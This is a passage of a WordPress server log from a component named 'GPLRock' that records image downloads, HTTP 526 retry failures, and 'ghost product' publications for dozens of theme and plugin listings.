18:14:39 UTC] GPLRock: Using pre-downloaded image for product iconic-woocommerce-product-configurator: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5e76ffdc.jpg [05-Apr-2026 18:14:39 UTC] GPLRock: Ghost product published with image - Product ID: iconic-woocommerce-product-configurator [05-Apr-2026 18:14:44 UTC] GPLRock: Image downloaded successfully for product tax-help-finance-accounting-adviser-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-566bcd3e.png [05-Apr-2026 18:14:44 UTC] GPLRock: Using pre-downloaded image for product tax-help-finance-accounting-adviser-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-566bcd3e.png [05-Apr-2026 18:14:44 UTC] GPLRock: Ghost product published with image - Product ID: tax-help-finance-accounting-adviser-theme [05-Apr-2026 18:14:46 UTC] GPLRock: Image downloaded successfully for product golock-locksmith-key-maker-service-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9e9bb770.jpg [05-Apr-2026 18:14:46 UTC] GPLRock: Using pre-downloaded image for product golock-locksmith-key-maker-service-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9e9bb770.jpg [05-Apr-2026 18:14:46 UTC] GPLRock: Ghost product published with image - Product ID: golock-locksmith-key-maker-service-elementor-pro-template-kit [05-Apr-2026 18:15:27 UTC] GPLRock: Image downloaded successfully for product woocommerce-pdf-invoices-packing-slips (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-73600873.png [05-Apr-2026 18:15:27 UTC] GPLRock: Using pre-downloaded image for product woocommerce-pdf-invoices-packing-slips: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-73600873.png [05-Apr-2026 18:15:27 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-pdf-invoices-packing-slips [05-Apr-2026 18:15:29 UTC] GPLRock: Image downloaded successfully for product aixor-marketing-agency (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e78d81f7.png [05-Apr-2026 18:15:30 UTC] GPLRock: Using pre-downloaded image for product aixor-marketing-agency: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e78d81f7.png [05-Apr-2026 18:15:30 UTC] GPLRock: Ghost product published with image - Product ID: aixor-marketing-agency [05-Apr-2026 18:15:31 UTC] GPLRock: Image downloaded successfully for product kinerio-video-production-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3c7dd5fe.jpg [05-Apr-2026 18:15:31 UTC] GPLRock: Using pre-downloaded image for product kinerio-video-production-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3c7dd5fe.jpg [05-Apr-2026 18:15:31 UTC] GPLRock: Ghost product published with image - Product ID: kinerio-video-production-agency-elementor-template-kit [05-Apr-2026 18:15:33 UTC] GPLRock: Image downloaded successfully for product ohlala-cake-shop-ice-cream-juice-bar-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ba6d2fb1.jpg [05-Apr-2026 18:15:33 UTC] GPLRock: Using pre-downloaded image for product ohlala-cake-shop-ice-cream-juice-bar-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ba6d2fb1.jpg [05-Apr-2026 18:15:33 UTC] GPLRock: Ghost product published with image - Product ID: ohlala-cake-shop-ice-cream-juice-bar-wordpress-theme [05-Apr-2026 18:15:35 UTC] GPLRock: Image downloaded successfully for product gamipress-woocommerce-partial-payments (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-48dfd53c.jpg [05-Apr-2026 18:15:35 UTC] GPLRock: Using pre-downloaded image for product gamipress-woocommerce-partial-payments: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-48dfd53c.jpg [05-Apr-2026 18:15:35 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-woocommerce-partial-payments [05-Apr-2026 18:15:36 UTC] GPLRock: Image downloaded successfully for product gamipress-credly (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-25feb12f.jpg [05-Apr-2026 18:15:36 UTC] GPLRock: Using pre-downloaded image for product gamipress-credly: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-25feb12f.jpg [05-Apr-2026 18:15:36 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-credly [05-Apr-2026 18:15:37 UTC] GPLRock: Image downloaded successfully for product gamipress-badgr (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4669083f.jpg [05-Apr-2026 18:15:37 UTC] GPLRock: Using pre-downloaded image for product gamipress-badgr: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4669083f.jpg [05-Apr-2026 18:15:37 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-badgr [05-Apr-2026 18:15:39 UTC] GPLRock: Image downloaded successfully for product gamipress-restrict-content (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f860e887.jpg [05-Apr-2026 18:15:39 UTC] GPLRock: Using pre-downloaded image for product gamipress-restrict-content: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f860e887.jpg [05-Apr-2026 18:15:39 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-restrict-content [05-Apr-2026 18:15:40 UTC] GPLRock: Image downloaded successfully for product gamipress-buddypress-notifications (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eb7f6cf7.jpg [05-Apr-2026 18:15:40 UTC] GPLRock: Using pre-downloaded image for product gamipress-buddypress-notifications: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eb7f6cf7.jpg [05-Apr-2026 18:15:40 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-buddypress-notifications [05-Apr-2026 18:15:42 UTC] GPLRock: Image downloaded successfully for product gamipress-buddyboss-notifications (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6c629df7.jpg [05-Apr-2026 18:15:42 UTC] GPLRock: Using pre-downloaded image for product gamipress-buddyboss-notifications: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6c629df7.jpg [05-Apr-2026 18:15:42 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-buddyboss-notifications [05-Apr-2026 18:18:49 UTC] GPLRock: Image download failed for product ultimate-wpbakery-page-builder-pricing-tables (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:18:51 UTC] GPLRock: Image download failed for product ultimate-wpbakery-page-builder-pricing-tables (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:18:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-wpbakery-page-builder-pricing-tables-22843.webp for product ultimate-wpbakery-page-builder-pricing-tables after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:18:53 UTC] GPLRock: Image download failed for product ultimate-wpbakery-page-builder-pricing-tables (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:18:55 UTC] GPLRock: Image download failed for product ultimate-wpbakery-page-builder-pricing-tables (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:18:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-wpbakery-page-builder-pricing-tables-22843.webp for product ultimate-wpbakery-page-builder-pricing-tables after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:18:58 UTC] GPLRock WARNING: Image download failed for product ultimate-wpbakery-page-builder-pricing-tables. URL: https://meldwp.com/wp-content/uploads/ultimate-wpbakery-page-builder-pricing-tables-22843.webp [05-Apr-2026 18:18:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ultimate-wpbakery-page-builder-pricing-tables [05-Apr-2026 18:18:58 UTC] GPLRock: Image download failed for product media-boxes-portfolio-jquery-grid-gallery-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:00 UTC] GPLRock: Image download failed for product media-boxes-portfolio-jquery-grid-gallery-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/media-boxes-portfolio---jquery-grid-gallery-plugin-24839.webp for product media-boxes-portfolio-jquery-grid-gallery-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:19:02 UTC] GPLRock: Image download failed for product media-boxes-portfolio-jquery-grid-gallery-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:04 UTC] GPLRock: Image download failed for product media-boxes-portfolio-jquery-grid-gallery-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/media-boxes-portfolio---jquery-grid-gallery-plugin-24839.webp for product media-boxes-portfolio-jquery-grid-gallery-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:19:06 UTC] GPLRock WARNING: Image download failed for product media-boxes-portfolio-jquery-grid-gallery-plugin. URL: https://meldwp.com/wp-content/uploads/media-boxes-portfolio---jquery-grid-gallery-plugin-24839.webp [05-Apr-2026 18:19:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: media-boxes-portfolio-jquery-grid-gallery-plugin [05-Apr-2026 18:19:07 UTC] GPLRock: Image download failed for product woocommerce-stock-status-in-product-loop (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:09 UTC] GPLRock: Image download failed for product woocommerce-stock-status-in-product-loop (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-stock-status-in-product-loop-3420.webp for product woocommerce-stock-status-in-product-loop after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:19:11 UTC] GPLRock: Image download failed for product woocommerce-stock-status-in-product-loop (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:13 UTC] GPLRock: Image download failed for product woocommerce-stock-status-in-product-loop (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-stock-status-in-product-loop-3420.webp for product woocommerce-stock-status-in-product-loop after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:19:15 UTC] GPLRock WARNING: Image download failed for product woocommerce-stock-status-in-product-loop. URL: https://meldwp.com/wp-content/uploads/woocommerce-stock-status-in-product-loop-3420.webp [05-Apr-2026 18:19:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-stock-status-in-product-loop [05-Apr-2026 18:19:15 UTC] GPLRock: Image download failed for product worldpay-woocommerce-payment-gateway-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:18 UTC] GPLRock: Image download failed for product worldpay-woocommerce-payment-gateway-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/worldpay-woocommerce-payment-gateway-plugin-31479.webp for product worldpay-woocommerce-payment-gateway-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:19:20 UTC] GPLRock: Image download failed for product worldpay-woocommerce-payment-gateway-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:22 UTC] GPLRock: Image download failed for product worldpay-woocommerce-payment-gateway-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/worldpay-woocommerce-payment-gateway-plugin-31479.webp for product worldpay-woocommerce-payment-gateway-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:19:24 UTC] GPLRock WARNING: Image download failed for product worldpay-woocommerce-payment-gateway-plugin. URL: https://meldwp.com/wp-content/uploads/worldpay-woocommerce-payment-gateway-plugin-31479.webp [05-Apr-2026 18:19:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: worldpay-woocommerce-payment-gateway-plugin [05-Apr-2026 18:19:24 UTC] GPLRock: Image download failed for product contact-form-7-google-auto-address-suggestion (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:26 UTC] GPLRock: Image download failed for product contact-form-7-google-auto-address-suggestion (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contact-form-7-google-auto-address-suggestion-28717.webp for product contact-form-7-google-auto-address-suggestion after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:19:29 UTC] GPLRock: Image download failed for product contact-form-7-google-auto-address-suggestion (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:31 UTC] GPLRock: Image download failed for product contact-form-7-google-auto-address-suggestion (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contact-form-7-google-auto-address-suggestion-28717.webp for product contact-form-7-google-auto-address-suggestion after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:19:33 UTC] GPLRock WARNING: Image download failed for product contact-form-7-google-auto-address-suggestion. URL: https://meldwp.com/wp-content/uploads/contact-form-7-google-auto-address-suggestion-28717.webp [05-Apr-2026 18:19:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: contact-form-7-google-auto-address-suggestion [05-Apr-2026 18:19:33 UTC] GPLRock: Image downloaded successfully for product html5-audio-players-wordpress-plugins-bundle (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c973e34c.webp [05-Apr-2026 18:19:33 UTC] GPLRock: Using pre-downloaded image for product html5-audio-players-wordpress-plugins-bundle: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c973e34c.webp [05-Apr-2026 18:19:33 UTC] GPLRock: Ghost product published with image - Product ID: html5-audio-players-wordpress-plugins-bundle [05-Apr-2026 18:19:33 UTC] GPLRock: Image download failed for product bookly-payson-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:35 UTC] GPLRock: Image download failed for product bookly-payson-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookly-payson-add-on-22607.webp for product bookly-payson-add-on after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:19:37 UTC] GPLRock: Image download failed for product bookly-payson-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:39 UTC] GPLRock: Image download failed for product bookly-payson-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookly-payson-add-on-22607.webp for product bookly-payson-add-on after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:19:42 UTC] GPLRock WARNING: Image download failed for product bookly-payson-add-on. URL: https://meldwp.com/wp-content/uploads/bookly-payson-add-on-22607.webp [05-Apr-2026 18:19:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bookly-payson-add-on [05-Apr-2026 18:19:42 UTC] GPLRock: Image download failed for product wooaffiliates-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:44 UTC] GPLRock: Image download failed for product wooaffiliates-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wooaffiliates---wordpress-plugin-9723.webp for product wooaffiliates-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:19:46 UTC] GPLRock: Image download failed for product wooaffiliates-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:48 UTC] GPLRock: Image download failed for product wooaffiliates-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wooaffiliates---wordpress-plugin-9723.webp for product wooaffiliates-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:19:50 UTC] GPLRock WARNING: Image download failed for product wooaffiliates-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/wooaffiliates---wordpress-plugin-9723.webp [05-Apr-2026 18:19:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wooaffiliates-wordpress-plugin [05-Apr-2026 18:19:51 UTC] GPLRock: Image download failed for product woocommerce-countdown-timer-flash-sales-price-discount-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:53 UTC] GPLRock: Image download failed for product woocommerce-countdown-timer-flash-sales-price-discount-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-countdown-timer--flash-sales--price-discount-plugin-15888.webp for product woocommerce-countdown-timer-flash-sales-price-discount-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:19:55 UTC] GPLRock: Image download failed for product woocommerce-countdown-timer-flash-sales-price-discount-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:57 UTC] GPLRock: Image download failed for product woocommerce-countdown-timer-flash-sales-price-discount-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:19:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-countdown-timer--flash-sales--price-discount-plugin-15888.webp for product woocommerce-countdown-timer-flash-sales-price-discount-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:19:59 UTC] GPLRock WARNING: Image download failed for product woocommerce-countdown-timer-flash-sales-price-discount-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-countdown-timer--flash-sales--price-discount-plugin-15888.webp [05-Apr-2026 18:19:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-countdown-timer-flash-sales-price-discount-plugin [05-Apr-2026 18:19:59 UTC] GPLRock: Image download failed for product virtual-phone-number-selling-system-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:20:01 UTC] GPLRock: Image download failed for product virtual-phone-number-selling-system-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:20:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/virtual-phone-number-selling-system-wordpress-plugin-25370.webp for product virtual-phone-number-selling-system-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:20:04 UTC] GPLRock: Image download failed for product virtual-phone-number-selling-system-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:20:06 UTC] GPLRock: Image download failed for product virtual-phone-number-selling-system-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:20:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/virtual-phone-number-selling-system-wordpress-plugin-25370.webp for product virtual-phone-number-selling-system-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:20:08 UTC] GPLRock WARNING: Image download failed for product virtual-phone-number-selling-system-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/virtual-phone-number-selling-system-wordpress-plugin-25370.webp [05-Apr-2026 18:20:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: virtual-phone-number-selling-system-wordpress-plugin [05-Apr-2026 18:20:32 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-conditional-gateways-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d3714f72.jpg [05-Apr-2026 18:20:32 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-conditional-gateways-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d3714f72.jpg [05-Apr-2026 18:20:32 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-conditional-gateways-addon [05-Apr-2026 18:20:33 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-pushover-notifications-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a8d1c3be.jpg [05-Apr-2026 18:20:33 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-pushover-notifications-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a8d1c3be.jpg [05-Apr-2026 18:20:33 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-pushover-notifications-addon [05-Apr-2026 18:20:35 UTC] GPLRock: Image downloaded successfully for product codrop-app-landing-page-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-871eb578.jpg [05-Apr-2026 18:20:35 UTC] GPLRock: Using pre-downloaded image for product codrop-app-landing-page-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-871eb578.jpg [05-Apr-2026 18:20:35 UTC] GPLRock: Ghost product published with image - Product ID: codrop-app-landing-page-theme [05-Apr-2026 18:20:37 UTC] GPLRock: Image downloaded successfully for product proui-responsive-bootstrap-admin-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7423f1ca.jpg [05-Apr-2026 18:20:37 UTC] GPLRock: Using pre-downloaded image for product proui-responsive-bootstrap-admin-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7423f1ca.jpg [05-Apr-2026 18:20:37 UTC] GPLRock: Ghost product published with image - Product ID: proui-responsive-bootstrap-admin-template [05-Apr-2026 18:20:38 UTC] GPLRock: Image downloaded successfully for product rekord-ajaxify-music-events-podcasts-multipurpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d6418b84.jpg [05-Apr-2026 18:20:38 UTC] GPLRock: Using pre-downloaded image for product rekord-ajaxify-music-events-podcasts-multipurpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d6418b84.jpg [05-Apr-2026 18:20:38 UTC] GPLRock: Ghost product published with image - Product ID: rekord-ajaxify-music-events-podcasts-multipurpose-wordpress-theme [05-Apr-2026 18:20:40 UTC] GPLRock: Image downloaded successfully for product eskimo-minimal-personal-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-89780843.jpg [05-Apr-2026 18:20:40 UTC] GPLRock: Using pre-downloaded image for product eskimo-minimal-personal-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-89780843.jpg [05-Apr-2026 18:20:40 UTC] GPLRock: Ghost product published with image - Product ID: eskimo-minimal-personal-wordpress-blog-theme [05-Apr-2026 18:20:41 UTC] GPLRock: Image downloaded successfully for product wooevents-calendar-and-event-booking (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-db3c4162.jpg [05-Apr-2026 18:20:41 UTC] GPLRock: Using pre-downloaded image for product wooevents-calendar-and-event-booking: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-db3c4162.jpg [05-Apr-2026 18:20:41 UTC] GPLRock: Ghost product published with image - Product ID: wooevents-calendar-and-event-booking [05-Apr-2026 18:20:43 UTC] GPLRock: Image downloaded successfully for product canifa-fashion-responsive-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-76c00dae.jpg [05-Apr-2026 18:20:43 UTC] GPLRock: Using pre-downloaded image for product canifa-fashion-responsive-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-76c00dae.jpg [05-Apr-2026 18:20:43 UTC] GPLRock: Ghost product published with image - Product ID: canifa-fashion-responsive-woocommerce-theme [05-Apr-2026 18:20:45 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-wallet-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-88a6d486.jpg [05-Apr-2026 18:20:45 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-wallet-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-88a6d486.jpg [05-Apr-2026 18:20:45 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-wallet-addon [05-Apr-2026 18:20:46 UTC] GPLRock: Image downloaded successfully for product dixon-lamber-law-firm-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-94196dd7.jpg [05-Apr-2026 18:20:46 UTC] GPLRock: Using pre-downloaded image for product dixon-lamber-law-firm-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-94196dd7.jpg [05-Apr-2026 18:20:46 UTC] GPLRock: Ghost product published with image - Product ID: dixon-lamber-law-firm-wordpress-theme [05-Apr-2026 18:23:30 UTC] GPLRock: Image download failed for product brodie-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:23:32 UTC] GPLRock: Image download failed for product brodie-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:23:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/brodie---personal-portfolio-wordpress-theme-20795.webp for product brodie-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:23:34 UTC] GPLRock: Image download failed for product brodie-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:23:36 UTC] GPLRock: Image download failed for product brodie-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:23:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/brodie---personal-portfolio-wordpress-theme-20795.webp for product brodie-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:23:38 UTC] GPLRock WARNING: Image download failed for product brodie-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/brodie---personal-portfolio-wordpress-theme-20795.webp [05-Apr-2026 18:23:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: brodie-personal-portfolio-wordpress-theme [05-Apr-2026 18:23:39 UTC] GPLRock: Image download failed for product biagiotti-beauty-and-cosmetics-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:23:41 UTC] GPLRock: Image download failed for product biagiotti-beauty-and-cosmetics-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:23:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/biagiotti---beauty-and-cosmetics-shop-wordpress-theme-30131.webp for product biagiotti-beauty-and-cosmetics-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:23:43 UTC] GPLRock: Image download failed for product biagiotti-beauty-and-cosmetics-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:23:45 UTC] GPLRock: Image download failed for product biagiotti-beauty-and-cosmetics-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:23:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/biagiotti---beauty-and-cosmetics-shop-wordpress-theme-30131.webp for product biagiotti-beauty-and-cosmetics-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:23:47 UTC] GPLRock WARNING: Image download failed for product biagiotti-beauty-and-cosmetics-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/biagiotti---beauty-and-cosmetics-shop-wordpress-theme-30131.webp [05-Apr-2026 18:23:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: biagiotti-beauty-and-cosmetics-shop-wordpress-theme [05-Apr-2026 18:23:47 UTC] GPLRock: Image download failed for product specto-cinema-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . 